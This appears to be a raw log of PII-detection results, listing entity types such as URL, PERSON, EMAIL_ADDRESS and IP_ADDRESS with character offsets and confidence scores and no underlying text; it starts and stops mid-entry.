5692, score: 0.5, type: URL, start: 5698, end: 5711, score: 0.5, type: URL, start: 5726, end: 5740, score: 0.5, type: URL, start: 5773, end: 5787, score: 0.5, type: URL, start: 5793, end: 5806, score: 0.5, type: URL, start: 5821, end: 5835, score: 0.5, type: URL, start: 5841, end: 5854, score: 0.5, type: URL, start: 5870, end: 5884, score: 0.5, type: URL, start: 5890, end: 5903, score: 0.5, type: URL, start: 5915, end: 5941, score: 0.5, type: URL, start: 5947, end: 5960, score: 0.5, type: URL, start: 5978, end: 5992, score: 0.5, type: URL, start: 5998, end: 6011, score: 0.5, type: URL, start: 6272, end: 6298, score: 0.5, type: URL, start: 6703, end: 6708, score: 0.5, type: URL, start: 7149, end: 7186, score: 0.5, type: URL, start: 7212, end: 7241, score: 0.5, type: URL, start: 7931, end: 7962, score: 0.5, type: URL, start: 7984, end: 8002, score: 0.5, type: URL, start: 8005, end: 8016, score: 0.5, type: URL, start: 8387, end: 8395, score: 0.5, type: URL, start: 8545, end: 8555, score: 0.5, type: URL, start: 9185, end: 9204, score: 0.5, type: URL, start: 9409, end: 9428, score: 0.5, type: URL, start: 9504, end: 9513, score: 0.5, type: URL, start: 9851, end: 9860, score: 0.5, type: URL, start: 9981, end: 9990, score: 0.5, type: URL, start: 10138, end: 10147, score: 0.5, type: URL, start: 10152, end: 10180, score: 0.5, type: URL, start: 10659, end: 10680, score: 0.5, type: URL, start: 11053, end: 11066, score: 0.5, type: URL, start: 11116, end: 11129, score: 0.5, type: URL, start: 11221, end: 11230, score: 0.5, type: URL, start: 11267, end: 11292, score: 0.5, type: URL, start: 11334, end: 11368, score: 0.5, type: URL, start: 11455, end: 11464, score: 0.5, type: URL, start: 
11720, end: 11729, score: 0.5, type: URL, start: 11770, end: 11779, score: 0.5, type: URL, start: 11830, end: 11839, score: 0.5, type: URL, start: 11888, end: 11897, score: 0.5, type: URL, start: 11942, end: 11951, score: 0.5, type: URL, start: 11999, end: 12008, score: 0.5, type: URL, start: 12051, end: 12060, score: 0.5, type: URL, start: 12680, end: 12691, score: 0.5, type: URL, start: 12838, end: 12847, score: 0.5, type: URL, start: 12887, end: 12896, score: 0.5, type: URL, start: 12938, end: 12947, score: 0.5, type: URL, start: 13636, end: 13645, score: 0.5, type: URL, start: 13678, end: 13687, score: 0.5, type: URL, start: 13707, end: 13716, score: 0.5, type: URL, start: 13721, end: 13738, score: 0.5, type: URL, start: 13767, end: 13776, score: 0.5, type: URL, start: 13861, end: 13870, score: 0.5, type: URL, start: 13950, end: 13960, score: 0.5, type: URL, start: 14048, end: 14057, score: 0.5, type: URL, start: 14350, end: 14376, score: 0.5, type: URL, start: 14405, end: 14431, score: 0.5, type: URL, start: 14908, end: 14917, score: 0.5, type: URL, start: 15117, end: 15126, score: 0.5, type: URL, start: 15292, end: 15313, score: 0.5, type: URL, start: 15477, end: 15505, score: 0.5, type: URL, start: 15882, end: 15899, score: 0.5, type: URL, start: 15913, end: 15930, score: 0.5, type: URL, start: 15952, end: 15969, score: 0.5, type: URL, start: 15987, end: 16004, score: 0.5, type: URL, start: 16019, end: 16036, score: 0.5, type: URL, start: 16054, end: 16071, score: 0.5, type: URL, start: 16127, end: 16144, score: 0.5, type: URL, start: 16179, end: 16196, score: 0.5, type: URL, start: 16665, end: 16675, score: 0.5, type: URL, start: 16708, end: 16718, score: 0.5, type: URL, start: 16868, end: 16905, score: 0.5, type: URL, start: 16932, end: 16960, score: 0.5, type: URL, start: 17038, end: 17071, score: 0.5, type: URL, start: 17105, end: 17142, score: 0.5, type: URL, start: 17169, end: 17189, score: 0.5, type: URL, start: 17734, end: 17743, score: 0.5, type: URL, start: 18120, end: 18129, score: 0.5, type: URL, start: 18134, end: 18162, score: 0.5, type: URL, start: 18388, end: 18397, score: 0.5, type: URL, start: 18936, end: 18956, score: 0.5, type: URL, start: 19884, end: 19906, score: 0.5, type: URL, start: 19912, end: 19925, score: 0.5, type: URL, start: 19939, end: 19957, score: 0.5, type: URL, start: 19963, end: 19976, score: 0.5, type: URL, start: 19993, end: 20017, score: 0.5, type: URL, start: 20023, end: 20036, score: 0.5, type: URL, start: 20059, end: 20073, score: 0.5, type: URL, start: 20079, end: 20092, score: 0.5, type: URL, start: 20107, end: 20121, score: 0.5, type: URL, start: 20154, end: 20168, score: 0.5, type: URL, start: 20174, end: 20187, score: 0.5, type: URL, start: 20202, end: 20216, score: 0.5, type: URL, start: 20222, end: 20235, score: 0.5, type: URL, start: 20251, end: 20265, score: 0.5, type: URL, start: 20271, end: 20284, score: 0.5, type: URL, start: 20296, end: 20322, score: 0.5, type: URL, start: 20328, end: 20341, score: 0.5, type: URL, start: 20359, end: 20373, score: 0.5, type: URL, start: 20379, end: 20392, score: 0.5, type: URL, start: 20653, end: 20679, score: 0.5, type: URL, start: 21084, end: 21089, score: 0.5, type: URL, start: 21530, end: 21567, score: 0.5, type: URL, start: 21593, end: 21622, score: 0.5, type: URL, start: 22312, end: 22343, score: 0.5, type: URL, start: 22365, end: 22383, score: 0.5, type: URL, start: 22386, end: 22397, score: 0.5, type: URL, start: 22732, end: 22740, score: 0.5, type: URL, start: 22890, end: 22900, score: 
0.5, type: URL, start: 23530, end: 23549, score: 0.5, type: URL, start: 23754, end: 23773, score: 0.5, type: URL, start: 23849, end: 23858, score: 0.5, type: PERSON, start: 906, end: 920, score: 0.85, type: LOCATION, start: 976, end: 984, score: 0.85, type: PERSON, start: 3254, end: 3267, score: 0.85, type: PERSON, start: 4768, end: 4781, score: 0.85, type: PERSON, start: 5851, end: 5864, score: 0.85, type: PERSON, start: 6671, end: 6725, score: 0.85, type: PERSON, start: 7361, end: 7374, score: 0.85, type: PERSON, start: 9561, end: 9567, score: 0.85, type: PERSON, start: 9635, end: 9669, score: 0.85, type: PERSON, start: 10171, end: 10182, score: 0.85, type: PERSON, start: 10368, end: 10374, score: 0.85, type: PERSON, start: 11049, end: 11055, score: 0.85, type: URL, start: 238, end: 280, score: 0.6, type: URL, start: 784, end: 793, score: 0.5, type: URL, start: 1071, end: 1078, score: 0.5, type: URL, start: 1086, end: 1093, score: 0.5, type: URL, start: 1106, end: 1113, score: 0.5, type: URL, start: 1129, end: 1136, score: 0.5, type: URL, start: 1149, end: 1156, score: 0.5, type: URL, start: 1164, end: 1171, score: 0.5, type: URL, start: 1483, end: 1490, score: 0.5, type: URL, start: 1585, end: 1593, score: 0.5, type: URL, start: 1608, end: 1615, score: 0.5, type: URL, start: 1667, end: 1674, score: 0.5, type: URL, start: 1806, end: 1814, score: 0.5, type: URL, start: 1823, end: 1830, score: 0.5, type: URL, start: 2474, end: 2481, score: 0.5, type: URL, start: 2484, end: 2489, score: 0.5, type: URL, start: 2520, end: 2525, score: 0.5, type: URL, start: 2558, end: 2566, score: 0.5, type: URL, start: 2584, end: 2591, score: 0.5, type: URL, start: 2617, end: 2624, score: 0.5, type: URL, start: 2655, end: 2662, score: 0.5, type: URL, start: 2665, end: 2670, score: 0.5, type: URL, start: 2701, end: 2706, score: 0.5, type: URL, start: 2740, end: 2748, score: 0.5, type: URL, start: 2766, end: 2773, score: 0.5, type: URL, start: 2799, end: 2806, score: 0.5, type: URL, start: 2943, end: 2950, score: 0.5, type: URL, start: 2972, end: 2979, score: 0.5, type: URL, start: 2982, end: 2987, score: 0.5, type: URL, start: 3004, end: 3013, score: 0.5, type: URL, start: 3048, end: 3055, score: 0.5, type: URL, start: 3118, end: 3134, score: 0.5, type: URL, start: 3157, end: 3164, score: 0.5, type: URL, start: 3229, end: 3236, score: 0.5, type: URL, start: 3279, end: 3286, score: 0.5, type: URL, start: 3343, end: 3350, score: 0.5, type: URL, start: 3415, end: 3422, score: 0.5, type: URL, start: 3439, end: 3455, score: 0.5, type: URL, start: 3877, end: 3884, score: 0.5, type: URL, start: 3939, end: 3946, score: 0.5, type: URL, start: 4016, end: 4022, score: 0.5, type: URL, start: 4140, end: 4154, score: 0.5, type: URL, start: 4188, end: 4196, score: 0.5, type: URL, start: 4204, end: 4211, score: 0.5, type: URL, start: 4388, end: 4395, score: 0.5, type: URL, start: 4438, end: 4445, score: 0.5, type: URL, start: 4500, end: 4507, score: 0.5, type: URL, start: 4543, end: 4550, score: 0.5, type: URL, start: 4634, end: 4650, score: 0.5, type: URL, start: 4673, end: 4680, score: 0.5, type: URL, start: 4743, end: 4750, score: 0.5, type: URL, start: 4793, end: 4800, score: 0.5, type: URL, start: 4857, end: 4864, score: 0.5, type: URL, start: 4929, end: 4936, score: 0.5, type: URL, start: 4953, end: 4969, score: 0.5, type: URL, start: 5367, end: 5374, score: 0.5, type: URL, start: 5429, end: 5436, score: 0.5, type: URL, start: 5478, end: 5486, score: 0.5, type: URL, start: 5494, end: 5501, score: 0.5, type: URL, start: 
5670, end: 5677, score: 0.5, type: URL, start: 5716, end: 5732, score: 0.5, type: URL, start: 5755, end: 5762, score: 0.5, type: URL, start: 5826, end: 5833, score: 0.5, type: URL, start: 5876, end: 5883, score: 0.5, type: URL, start: 5943, end: 5950, score: 0.5, type: URL, start: 6006, end: 6013, score: 0.5, type: URL, start: 6030, end: 6046, score: 0.5, type: URL, start: 6066, end: 6073, score: 0.5, type: URL, start: 6078, end: 6102, score: 0.5, type: URL, start: 6534, end: 6541, score: 0.5, type: URL, start: 6596, end: 6603, score: 0.5, type: URL, start: 6646, end: 6653, score: 0.5, type: URL, start: 6686, end: 6691, score: 0.5, type: URL, start: 6739, end: 6747, score: 0.5, type: URL, start: 6755, end: 6762, score: 0.5, type: URL, start: 7044, end: 7051, score: 0.5, type: URL, start: 7083, end: 7090, score: 0.5, type: URL, start: 7100, end: 7113, score: 0.5, type: URL, start: 7130, end: 7137, score: 0.5, type: URL, start: 7226, end: 7242, score: 0.5, type: URL, start: 7265, end: 7272, score: 0.5, type: URL, start: 7336, end: 7343, score: 0.5, type: URL, start: 7386, end: 7393, score: 0.5, type: URL, start: 7453, end: 7460, score: 0.5, type: URL, start: 7525, end: 7532, score: 0.5, type: URL, start: 7549, end: 7565, score: 0.5, type: URL, start: 7784, end: 7791, score: 0.5, type: URL, start: 7794, end: 7799, score: 0.5, type: URL, start: 7816, end: 7825, score: 0.5, type: URL, start: 7868, end: 7876, score: 0.5, type: URL, start: 7893, end: 7900, score: 0.5, type: URL, start: 8110, end: 8117, score: 0.5, type: URL, start: 8157, end: 8164, score: 0.5, type: URL, start: 8167, end: 8172, score: 0.5, type: URL, start: 8189, end: 8198, score: 0.5, type: URL, start: 8233, end: 8240, score: 0.5, type: URL, start: 8305, end: 8311, score: 0.5, type: URL, start: 8438, end: 8444, score: 0.5, type: URL, start: 8470, end: 8476, score: 0.5, type: URL, start: 8629, end: 8636, score: 0.5, type: URL, start: 8664, end: 8671, score: 0.5, type: URL, start: 8700, end: 8714, score: 0.5, type: URL, start: 8762, end: 8769, score: 0.5, type: URL, start: 8797, end: 8804, score: 0.5, type: URL, start: 8937, end: 8944, score: 0.5, type: URL, start: 8947, end: 8952, score: 0.5, type: URL, start: 8973, end: 8979, score: 0.5, type: URL, start: 9016, end: 9022, score: 0.5, type: URL, start: 9068, end: 9075, score: 0.5, type: URL, start: 9107, end: 9114, score: 0.5, type: URL, start: 9155, end: 9161, score: 0.5, type: URL, start: 9209, end: 9216, score: 0.5, type: URL, start: 9248, end: 9255, score: 0.5, type: URL, start: 9399, end: 9406, score: 0.5, type: URL, start: 9710, end: 9717, score: 0.5, type: URL, start: 9720, end: 9725, score: 0.5, type: URL, start: 9746, end: 9752, score: 0.5, type: URL, start: 9794, end: 9800, score: 0.5, type: URL, start: 9847, end: 9854, score: 0.5, type: URL, start: 9886, end: 9893, score: 0.5, type: URL, start: 9921, end: 9928, score: 0.5, type: URL, start: 9946, end: 9955, score: 0.5, type: URL, start: 9978, end: 9987, score: 0.5, type: URL, start: 10001, end: 10008, score: 0.5, type: URL, start: 10036, end: 10045, score: 0.5, type: URL, start: 10059, end: 10066, score: 0.5, type: URL, start: 10206, end: 10213, score: 0.5, type: URL, start: 10442, end: 10449, score: 0.5, type: URL, start: 10452, end: 10457, score: 0.5, type: URL, start: 10478, end: 10484, score: 0.5, type: URL, start: 10526, end: 10532, score: 0.5, type: URL, start: 10579, end: 10586, score: 0.5, type: URL, start: 10618, end: 10625, score: 0.5, type: URL, start: 10653, end: 10660, score: 0.5, type: URL, start: 10678, 
end: 10687, score: 0.5, type: URL, start: 10710, end: 10719, score: 0.5, type: URL, start: 10733, end: 10740, score: 0.5, type: URL, start: 10887, end: 10894, score: 0.5, type: URL, start: 11198, end: 11205, score: 0.5, type: URL, start: 11208, end: 11213, score: 0.5, type: URL, start: 11234, end: 11240, score: 0.5, type: URL, start: 11282, end: 11288, score: 0.5, type: URL, start: 11335, end: 11342, score: 0.5, type: URL, start: 11374, end: 11381, score: 0.5, type: URL, start: 11409, end: 11416, score: 0.5, type: URL, start: 11434, end: 11443, score: 0.5, type: URL, start: 11466, end: 11475, score: 0.5, type: URL, start: 11489, end: 11496, score: 0.5, type: URL, start: 11524, end: 11533, score: 0.5, type: URL, start: 11547, end: 11554, score: 0.5, type: URL, start: 11704, end: 11711, score: 0.5, type: URL, start: 11821, end: 11828, score: 0.5, type: URL, start: 11831, end: 11836, score: 0.5, type: URL, start: 11857, end: 11863, score: 0.5, type: URL, start: 11905, end: 11911, score: 0.5, type: URL, start: 11958, end: 11965, score: 0.5, type: URL, start: 11997, end: 12004, score: 0.5, type: URL, start: 12038, end: 12047, score: 0.5, type: PERSON, start: 1071, end: 1103, score: 0.85, type: NRP, start: 2073, end: 2080, score: 0.85, type: PERSON, start: 4060, end: 4068, score: 0.85, type: PERSON, start: 5317, end: 5322, score: 0.85, type: PERSON, start: 6018, end: 6022, score: 0.85, type: PERSON, start: 6150, end: 6163, score: 0.85, type: PERSON, start: 7295, end: 7308, score: 0.85, type: LOCATION, start: 8057, end: 8067, score: 0.85, type: URL, start: 1330, end: 1421, score: 0.6, type: URL, start: 6190, end: 6230, score: 0.6, type: URL, start: 50, end: 80, score: 0.5, type: URL, start: 138, end: 164, score: 0.5, type: URL, start: 196, end: 215, score: 0.5, type: URL, start: 241, end: 253, score: 0.5, type: URL, start: 432, end: 438, score: 0.5, type: URL, start: 456, end: 463, score: 0.5, type: URL, start: 468, end: 475, score: 0.5, type: URL, start: 539, end: 545, score: 0.5, type: URL, start: 606, end: 618, score: 0.5, type: URL, start: 623, end: 630, score: 0.5, type: URL, start: 653, end: 660, score: 0.5, type: URL, start: 698, end: 703, score: 0.5, type: URL, start: 1164, end: 1168, score: 0.5, type: URL, start: 1197, end: 1206, score: 0.5, type: URL, start: 1635, end: 1644, score: 0.5, type: URL, start: 1713, end: 1720, score: 0.5, type: URL, start: 1820, end: 1827, score: 0.5, type: URL, start: 2083, end: 2090, score: 0.5, type: URL, start: 2395, end: 2404, score: 0.5, type: URL, start: 2511, end: 2518, score: 0.5, type: URL, start: 2585, end: 2592, score: 0.5, type: URL, start: 2698, end: 2705, score: 0.5, type: URL, start: 2842, end: 2849, score: 0.5, type: URL, start: 2965, end: 2971, score: 0.5, type: URL, start: 3033, end: 3055, score: 0.5, type: URL, start: 3069, end: 3075, score: 0.5, type: URL, start: 3147, end: 3153, score: 0.5, type: URL, start: 3252, end: 3259, score: 0.5, type: URL, start: 3314, end: 3324, score: 0.5, type: URL, start: 3364, end: 3375, score: 0.5, type: URL, start: 3645, end: 3654, score: 0.5, type: URL, start: 4165, end: 4174, score: 0.5, type: URL, start: 4693, end: 4700, score: 0.5, type: URL, start: 4737, end: 4746, score: 0.5, type: URL, start: 4770, end: 4791, score: 0.5, type: URL, start: 5204, end: 5211, score: 0.5, type: URL, start: 5335, end: 5342, score: 0.5, type: URL, start: 5930, end: 5937, score: 0.5, type: URL, start: 6526, end: 6538, score: 0.5, type: URL, start: 6649, end: 6676, score: 0.5, type: URL, start: 6930, end: 6937, score: 0.5, 
type: URL, start: 7376, end: 7383, score: 0.5, type: URL, start: 7529, end: 7536, score: 0.5, type: URL, start: 7720, end: 7726, score: 0.5, type: URL, start: 8290, end: 8296, score: 0.5, type: DATE_TIME, start: 12, end: 21, score: 0.85, type: PERSON, start: 699, end: 712, score: 0.85, type: PERSON, start: 798, end: 811, score: 0.85, type: PERSON, start: 1625, end: 1638, score: 0.85, type: LOCATION, start: 1774, end: 1814, score: 0.85, type: PERSON, start: 1893, end: 1906, score: 0.85, type: PERSON, start: 1967, end: 1980, score: 0.85, type: PERSON, start: 2497, end: 2510, score: 0.85, type: PERSON, start: 3085, end: 3098, score: 0.85, type: PERSON, start: 3184, end: 3197, score: 0.85, type: PERSON, start: 3552, end: 3565, score: 0.85, type: PERSON, start: 3651, end: 3664, score: 0.85, type: PERSON, start: 3727, end: 3740, score: 0.85, type: PERSON, start: 3742, end: 3808, score: 0.85, type: PERSON, start: 3811, end: 3824, score: 0.85, type: PERSON, start: 4391, end: 4404, score: 0.85, type: PERSON, start: 4490, end: 4503, score: 0.85, type: PERSON, start: 4566, end: 4579, score: 0.85, type: PERSON, start: 4581, end: 4647, score: 0.85, type: PERSON, start: 4650, end: 4663, score: 0.85, type: PERSON, start: 4739, end: 4752, score: 0.85, type: NRP, start: 5342, end: 5387, score: 0.85, type: PERSON, start: 5473, end: 5486, score: 0.85, type: PERSON, start: 5574, end: 5587, score: 0.85, type: PERSON, start: 5786, end: 5799, score: 0.85, type: PERSON, start: 6818, end: 6831, score: 0.85, type: PERSON, start: 7290, end: 7303, score: 0.85, type: PERSON, start: 7766, end: 7779, score: 0.85, type: URL, start: 217, end: 259, score: 0.6, type: IP_ADDRESS, start: 6939, end: 6948, score: 0.6, type: IP_ADDRESS, start: 7049, end: 7058, score: 0.6, type: IP_ADDRESS, start: 7412, end: 7421, score: 0.6, type: IP_ADDRESS, start: 7524, end: 7533, score: 0.6, type: IP_ADDRESS, start: 7898, end: 7907, score: 0.6, type: IP_ADDRESS, start: 8047, end: 8056, score: 0.6, type: URL, start: 638, end: 645, score: 0.5, type: URL, start: 657, end: 665, score: 0.5, type: URL, start: 669, end: 683, score: 0.5, type: URL, start: 715, end: 722, score: 0.5, type: URL, start: 739, end: 747, score: 0.5, type: URL, start: 751, end: 765, score: 0.5, type: URL, start: 918, end: 928, score: 0.5, type: URL, start: 983, end: 991, score: 0.5, type: URL, start: 1029, end: 1043, score: 0.5, type: URL, start: 1083, end: 1093, score: 0.5, type: URL, start: 1148, end: 1156, score: 0.5, type: URL, start: 1196, end: 1210, score: 0.5, type: URL, start: 1250, end: 1260, score: 0.5, type: URL, start: 1314, end: 1322, score: 0.5, type: URL, start: 1362, end: 1376, score: 0.5, type: URL, start: 1416, end: 1426, score: 0.5, type: URL, start: 1480, end: 1488, score: 0.5, type: URL, start: 1522, end: 1536, score: 0.5, type: URL, start: 1561, end: 1568, score: 0.5, type: URL, start: 1580, end: 1588, score: 0.5, type: URL, start: 1593, end: 1607, score: 0.5, type: URL, start: 1736, end: 1744, score: 0.5, type: URL, start: 1781, end: 1795, score: 0.5, type: URL, start: 1839, end: 1846, score: 0.5, type: URL, start: 1858, end: 1866, score: 0.5, type: URL, start: 1871, end: 1885, score: 0.5, type: URL, start: 1909, end: 1916, score: 0.5, type: URL, start: 1928, end: 1936, score: 0.5, type: URL, start: 1941, end: 1955, score: 0.5, type: URL, start: 2057, end: 2071, score: 0.5, type: URL, start: 2099, end: 2109, score: 0.5, type: URL, start: 2123, end: 2129, score: 0.5, type: URL, start: 2150, end: 2164, score: 0.5, type: URL, start: 2219, end: 2233, 
score: 0.5, type: URL, start: 2282, end: 2296, score: 0.5, type: URL, start: 2313, end: 2319, score: 0.5, type: URL, start: 2349, end: 2363, score: 0.5, type: URL, start: 2414, end: 2421, score: 0.5, type: URL, start: 2438, end: 2446, score: 0.5, type: URL, start: 2901, end: 2910, score: 0.5, type: URL, start: 2950, end: 2964, score: 0.5, type: URL, start: 3002, end: 3009, score: 0.5, type: URL, start: 3026, end: 3034, score: 0.5, type: URL, start: 3102, end: 3109, score: 0.5, type: URL, start: 3126, end: 3134, score: 0.5, type: URL, start: 3139, end: 3153, score: 0.5, type: URL, start: 3376, end: 3383, score: 0.5, type: URL, start: 3417, end: 3431, score: 0.5, type: URL, start: 3469, end: 3476, score: 0.5, type: URL, start: 3493, end: 3501, score: 0.5, type: URL, start: 3569, end: 3576, score: 0.5, type: URL, start: 3593, end: 3601, score: 0.5, type: URL, start: 3606, end: 3620, score: 0.5, type: URL, start: 3668, end: 3675, score: 0.5, type: URL, start: 3687, end: 3695, score: 0.5, type: URL, start: 3700, end: 3714, score: 0.5, type: URL, start: 3743, end: 3750, score: 0.5, type: URL, start: 3762, end: 3770, score: 0.5, type: URL, start: 3775, end: 3789, score: 0.5, type: URL, start: 4055, end: 4065, score: 0.5, type: URL, start: 4119, end: 4126, score: 0.5, type: URL, start: 4187, end: 4201, score: 0.5, type: URL, start: 4259, end: 4269, score: 0.5, type: URL, start: 4295, end: 4302, score: 0.5, type: URL, start: 4308, end: 4315, score: 0.5, type: URL, start: 4332, end: 4340, score: 0.5, type: URL, start: 4408, end: 4415, score: 0.5, type: URL, start: 4432, end: 4440, score: 0.5, type: URL, start: 4445, end: 4459, score: 0.5, type: URL, start: 4507, end: 4514, score: 0.5, type: URL, start: 4526, end: 4534, score: 0.5, type: URL, start: 4539, end: 4553, score: 0.5, type: URL, start: 4582, end: 4589, score: 0.5, type: URL, start: 4601, end: 4609, score: 0.5, type: URL, start: 4614, end: 4628, score: 0.5, type: URL, start: 4666, end: 4673, score: 0.5, type: URL, start: 4685, end: 4693, score: 0.5, type: URL, start: 4698, end: 4712, score: 0.5, type: URL, start: 5027, end: 5037, score: 0.5, type: URL, start: 5087, end: 5093, score: 0.5, type: URL, start: 5146, end: 5153, score: 0.5, type: URL, start: 5214, end: 5228, score: 0.5, type: URL, start: 5285, end: 5295, score: 0.5, type: URL, start: 5321, end: 5328, score: 0.5, type: URL, start: 5370, end: 5376, score: 0.5, type: URL, start: 5393, end: 5400, score: 0.5, type: URL, start: 5417, end: 5425, score: 0.5, type: URL, start: 5490, end: 5497, score: 0.5, type: URL, start: 5514, end: 5522, score: 0.5, type: URL, start: 5591, end: 5598, score: 0.5, type: URL, start: 5615, end: 5623, score: 0.5, type: URL, start: 5628, end: 5642, score: 0.5, type: URL, start: 5706, end: 5713, score: 0.5, type: URL, start: 5730, end: 5738, score: 0.5, type: URL, start: 5743, end: 5757, score: 0.5, type: URL, start: 6083, end: 6092, score: 0.5, type: URL, start: 6097, end: 6105, score: 0.5, type: URL, start: 6107, end: 6123, score: 0.5, type: URL, start: 6147, end: 6157, score: 0.5, type: URL, start: 6208, end: 6220, score: 0.5, type: URL, start: 6269, end: 6279, score: 0.5, type: URL, start: 6320, end: 6330, score: 0.5, type: URL, start: 6376, end: 6387, score: 0.5, type: URL, start: 6402, end: 6412, score: 0.5, type: URL, start: 6476, end: 6483, score: 0.5, type: URL, start: 6521, end: 6535, score: 0.5, type: URL, start: 6758, end: 6765, score: 0.5, type: URL, start: 6777, end: 6785, score: 0.5, type: URL, start: 6790, end: 6804, score: 0.5, type: URL, start: 
6909, end: 6925, score: 0.5, type: URL, start: 7023, end: 7033, score: 0.5, type: URL, start: 7107, end: 7121, score: 0.5, type: URL, start: 7230, end: 7237, score: 0.5, type: URL, start: 7249, end: 7257, score: 0.5, type: URL, start: 7262, end: 7276, score: 0.5, type: URL, start: 7382, end: 7398, score: 0.5, type: URL, start: 7498, end: 7508, score: 0.5, type: URL, start: 7582, end: 7596, score: 0.5, type: URL, start: 7706, end: 7713, score: 0.5, type: URL, start: 7725, end: 7733, score: 0.5, type: URL, start: 7738, end: 7752, score: 0.5, type: URL, start: 7868, end: 7884, score: 0.5, type: URL, start: 8009, end: 8019, score: 0.5, type: URL, start: 8121, end: 8135, score: 0.5, type: EMAIL_ADDRESS, start: 50, end: 65, score: 1.0, type: EMAIL_ADDRESS, start: 101, end: 116, score: 1.0, type: EMAIL_ADDRESS, start: 151, end: 166, score: 1.0, type: EMAIL_ADDRESS, start: 199, end: 214, score: 1.0, type: EMAIL_ADDRESS, start: 252, end: 267, score: 1.0, type: EMAIL_ADDRESS, start: 297, end: 312, score: 1.0, type: EMAIL_ADDRESS, start: 351, end: 366, score: 1.0, type: DATE_TIME, start: 16, end: 25, score: 0.85, type: DATE_TIME, start: 27, end: 36, score: 0.85, type: PERSON, start: 37, end: 49, score: 0.85, type: DATE_TIME, start: 82, end: 91, score: 0.85, type: PERSON, start: 92, end: 100, score: 0.85, type: PERSON, start: 188, end: 198, score: 0.85, type: PERSON, start: 236, end: 251, score: 0.85, type: DATE_TIME, start: 284, end: 288, score: 0.85, type: PERSON, start: 289, end: 296, score: 0.85, type: DATE_TIME, start: 329, end: 333, score: 0.85, type: PERSON, start: 334, end: 350, score: 0.85, type: PERSON, start: 2558, end: 2582, score: 0.85, type: PERSON, start: 7847, end: 7857, score: 0.85, type: PERSON, start: 8918, end: 8927, score: 0.85, type: PERSON, start: 9564, end: 9573, score: 0.85, type: PERSON, start: 10946, end: 10973, score: 0.85, type: PERSON, start: 11999, end: 12026, score: 0.85, type: URL, start: 395, end: 453, score: 0.6, type: URL, start: 469, end: 521, score: 0.6, type: URL, start: 56, end: 65, score: 0.5, type: URL, start: 107, end: 116, score: 0.5, type: URL, start: 157, end: 166, score: 0.5, type: URL, start: 205, end: 214, score: 0.5, type: URL, start: 258, end: 267, score: 0.5, type: URL, start: 303, end: 312, score: 0.5, type: URL, start: 357, end: 366, score: 0.5, type: URL, start: 1048, end: 1066, score: 0.5, type: URL, start: 1223, end: 1241, score: 0.5, type: URL, start: 1313, end: 1331, score: 0.5, type: URL, start: 1513, end: 1520, score: 0.5, type: URL, start: 1577, end: 1591, score: 0.5, type: URL, start: 1613, end: 1627, score: 0.5, type: URL, start: 1962, end: 1969, score: 0.5, type: URL, start: 2057, end: 2066, score: 0.5, type: URL, start: 2313, end: 2331, score: 0.5, type: URL, start: 2520, end: 2533, score: 0.5, type: URL, start: 2572, end: 2585, score: 0.5, type: URL, start: 2600, end: 2607, score: 0.5, type: URL, start: 2616, end: 2623, score: 0.5, type: URL, start: 3602, end: 3609, score: 0.5, type: URL, start: 3762, end: 3775, score: 0.5, type: URL, start: 3824, end: 3831, score: 0.5, type: URL, start: 4029, end: 4037, score: 0.5, type: URL, start: 4082, end: 4095, score: 0.5, type: URL, start: 4428, end: 4439, score: 0.5, type: URL, start: 4514, end: 4520, score: 0.5, type: URL, start: 4569, end: 4582, score: 0.5, type: URL, start: 4733, end: 4741, score: 0.5, type: URL, start: 4879, end: 4885, score: 0.5, type: URL, start: 5013, end: 5019, score: 0.5, type: URL, start: 5134, end: 5140, score: 0.5, type: URL, start: 5204, end: 5215, score: 0.5, 
type: URL, start: 5222, end: 5228, score: 0.5, type: URL, start: 5298, end: 5304, score: 0.5, type: URL, start: 5497, end: 5510, score: 0.5, type: URL, start: 5559, end: 5566, score: 0.5, type: URL, start: 5641, end: 5649, score: 0.5, type: URL, start: 5714, end: 5726, score: 0.5, type: URL, start: 5771, end: 5784, score: 0.5, type: URL, start: 6654, end: 6667, score: 0.5, type: URL, start: 6997, end: 7004, score: 0.5, type: URL, start: 7194, end: 7210, score: 0.5, type: URL, start: 7234, end: 7250, score: 0.5, type: URL, start: 7263, end: 7274, score: 0.5, type: URL, start: 7312, end: 7325, score: 0.5, type: URL, start: 7693, end: 7709, score: 0.5, type: URL, start: 7761, end: 7777, score: 0.5, type: URL, start: 7803, end: 7819, score: 0.5, type: URL, start: 7861, end: 7867, score: 0.5, type: URL, start: 7881, end: 7897, score: 0.5, type: URL, start: 7979, end: 7986, score: 0.5, type: URL, start: 7992, end: 8004, score: 0.5, type: URL, start: 8358, end: 8374, score: 0.5, type: URL, start: 8407, end: 8423, score: 0.5, type: URL, start: 8451, end: 8457, score: 0.5, type: URL, start: 8513, end: 8519, score: 0.5, type: URL, start: 8753, end: 8763, score: 0.5, type: URL, start: 8816, end: 8826, score: 0.5, type: URL, start: 8930, end: 8948, score: 0.5, type: URL, start: 8996, end: 9004, score: 0.5, type: URL, start: 9157, end: 9163, score: 0.5, type: URL, start: 9291, end: 9309, score: 0.5, type: URL, start: 9354, end: 9366, score: 0.5, type: URL, start: 9523, end: 9531, score: 0.5, type: URL, start: 9576, end: 9588, score: 0.5, type: URL, start: 10203, end: 10219, score: 0.5, type: URL, start: 10389, end: 10402, score: 0.5, type: URL, start: 10659, end: 10666, score: 0.5, type: URL, start: 10953, end: 10969, score: 0.5, type: URL, start: 11002, end: 11018, score: 0.5, type: URL, start: 11051, end: 11062, score: 0.5, type: URL, start: 11126, end: 11134, score: 0.5, type: URL, start: 11177, end: 11186, score: 0.5, type: URL, start: 11252, end: 11268, score: 0.5, type: URL, start: 11436, end: 11449, score: 0.5, type: URL, start: 12006, end: 12022, score: 0.5, type: URL, start: 12055, end: 12071, score: 0.5, type: URL, start: 12104, end: 12115, score: 0.5, type: URL, start: 12278, end: 12294, score: 0.5, type: URL, start: 12342, end: 12355, score: 0.5, type: URL, start: 12395, end: 12408, score: 0.5, type: MEDICAL_LICENSE, start: 12781, end: 12790, score: 1.0, type: MEDICAL_LICENSE, start: 12894, end: 12903, score: 1.0, type: DATE_TIME, start: 39, end: 48, score: 0.85, type: NRP, start: 435, end: 446, score: 0.85, type: PERSON, start: 825, end: 836, score: 0.85, type: PERSON, start: 892, end: 896, score: 0.85, type: PERSON, start: 929, end: 933, score: 0.85, type: LOCATION, start: 1090, end: 1094, score: 0.85, type: PERSON, start: 1898, end: 1911, score: 0.85, type: PERSON, start: 1958, end: 1971, score: 0.85, type: PERSON, start: 2195, end: 2208, score: 0.85, type: PERSON, start: 2253, end: 2266, score: 0.85, type: PERSON, start: 4578, end: 4586, score: 0.85, type: PERSON, 